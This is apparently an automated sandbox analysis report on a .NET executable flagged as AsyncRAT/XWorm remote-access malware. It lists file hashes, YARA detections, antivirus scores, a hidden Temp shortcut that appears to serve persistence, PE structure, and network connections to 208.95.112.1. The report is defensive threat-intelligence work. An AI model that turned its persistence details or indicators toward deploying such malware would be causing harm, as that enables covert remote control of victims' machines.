                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):41
                                                                    Entropy (8bit):3.7195394315431693
                                                                    Encrypted:false
                                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                    Malicious:false
                                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\user\Desktop\kj93GnZHBS.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):42496
                                                                    Entropy (8bit):5.550716885634327
                                                                    Encrypted:false
                                                                    SSDEEP:768:5mrJDweBDuOkScrbsN/x6W8CAr43M4fJF5Pa9p+I6iOwhg3/mbC:50DwewicrbsN/YbRrcRF49II6iOwq+W
                                                                    MD5:0B489846AD1A6A399EC787E157FD0970
                                                                    SHA1:D930097EF83E3571D868F0F69D1513024676890D
                                                                    SHA-256:D73C8C0DF400AD51F19989A2E3A104929B31487992E20612912E3AF75BB26ED8
                                                                    SHA-512:C9DEFFC2E0DB98B4D6897F5776E28094D64EEC5EC2C96E6C95BD8C415D92F07812A25860E22A461928095E40C8F612A06003736250FBF84C74EF368224E356B4
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Joe Security
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Joe Security
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Joe Security
                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Sekoia.io
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\system log, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......D^..t[............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                    Process:C:\Users\user\Desktop\kj93GnZHBS.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 1 19:59:03 2025, mtime=Wed Jan 1 19:59:03 2025, atime=Wed Jan 1 19:59:03 2025, length=42496, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):1046
                                                                    Entropy (8bit):4.9672412091382645
                                                                    Encrypted:false
                                                                    SSDEEP:24:8KTfVD82TWfSRXPgK2H0FWAyicGMfqygm:8KTWP6RX2HCyicIyg
                                                                    MD5:E6A2F7603BA87DCF008F601DA28DE857
                                                                    SHA1:627DFECED055C263D498FEDCD897A62ECB7B44F3
                                                                    SHA-256:097982E75DA72599650C51D2A0B42F5AB4CDAE19DEC43FC7310D3916D45F36CC
                                                                    SHA-512:F19BEC5D7CBC5F44EE53D55FA1E9F14D1DC8DD1F96C222F9A2D9BB6D9C356116F17A40A3F494395885483B4FBE7C06F5829DBAFA03F313786B3987F3C0F18233
                                                                    Malicious:false
                                                                    Preview:L..................F.... ....U(..\...U(..\...U(..\............................:..DG..Yr?.D..U..k0.&...&...... M......,B.\...h;..\......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl!Z;.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....!Z9...Local.<......DWSl!Z;.....V.....................7...L.o.c.a.l.....N.1.....!ZU...Temp..:......DWSl!ZU.....\......................U..T.e.m.p.....^.2.....!Zb. .SYSTEM~1..F......!Zb.!Zb.....3*....................|.M.s.y.s.t.e.m. .l.o.g.......\...............-.......[............&-......C:\Users\user\AppData\Local\Temp\system log..'.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.s.y.s.t.e.m. .l.o.g.............:...........|....I.J.H..K..:...`.......X.......114127...........hT..CrF.f4... ..T4#.....,...W..hT..CrF.f4... ..T4#.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.550716885634327
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:kj93GnZHBS.exe
                                                                    File size:42'496 bytes
                                                                    MD5:0b489846ad1a6a399ec787e157fd0970
                                                                    SHA1:d930097ef83e3571d868f0f69d1513024676890d
                                                                    SHA256:d73c8c0df400ad51f19989a2e3a104929b31487992e20612912e3af75bb26ed8
                                                                    SHA512:c9deffc2e0db98b4d6897f5776e28094d64eec5ec2c96e6c95bd8c415d92f07812a25860e22a461928095e40c8f612a06003736250fbf84c74ef368224e356b4
                                                                    SSDEEP:768:5mrJDweBDuOkScrbsN/x6W8CAr43M4fJF5Pa9p+I6iOwhg3/mbC:50DwewicrbsN/YbRrcRF49II6iOwq+W
                                                                    TLSH:73133A457BE50216D5FF6BF918B362060B70B6038D23DB9E4CD89A9B1B37BC08A117D6
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug................................. ........@.. ....................................@................................
                                                                    Icon Hash:00928e8e8686b000
                                                                    Entrypoint:0x40ba0e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6775870E [Wed Jan 1 18:18:54 2025 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb9b80x53.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4f8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x9a140x9c007a0932543cc7580a26a893e7a6abb42fFalse0.48710436698717946data5.663581999336468IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xc0000x4f80x600bd68bd1895bc3dc5d32fa612e3d8d3f7False0.3782552083333333data3.7741613884910308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xe0000xc0x2005d85121373b81eceb228e93324adb961False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0xc0a00x264data0.4591503267973856
                                                                    RT_MANIFEST0xc3080x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 1, 2025 21:57:59.133932114 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:57:59.138725042 CET8049704208.95.112.1192.168.2.5
                                                                    Jan 1, 2025 21:57:59.138797998 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:57:59.139360905 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:57:59.144083977 CET8049704208.95.112.1192.168.2.5
                                                                    Jan 1, 2025 21:57:59.622014999 CET8049704208.95.112.1192.168.2.5
                                                                    Jan 1, 2025 21:57:59.668309927 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:58:37.814646959 CET8049704208.95.112.1192.168.2.5
                                                                    Jan 1, 2025 21:58:37.815200090 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:59:39.638761997 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:59:39.949701071 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:59:40.559079885 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:59:41.762233973 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:59:44.168446064 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:59:48.980959892 CET4970480192.168.2.5208.95.112.1
                                                                    Jan 1, 2025 21:59:58.590349913 CET4970480192.168.2.5208.95.112.1
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 1, 2025 21:57:59.121339083 CET5608653192.168.2.51.1.1.1
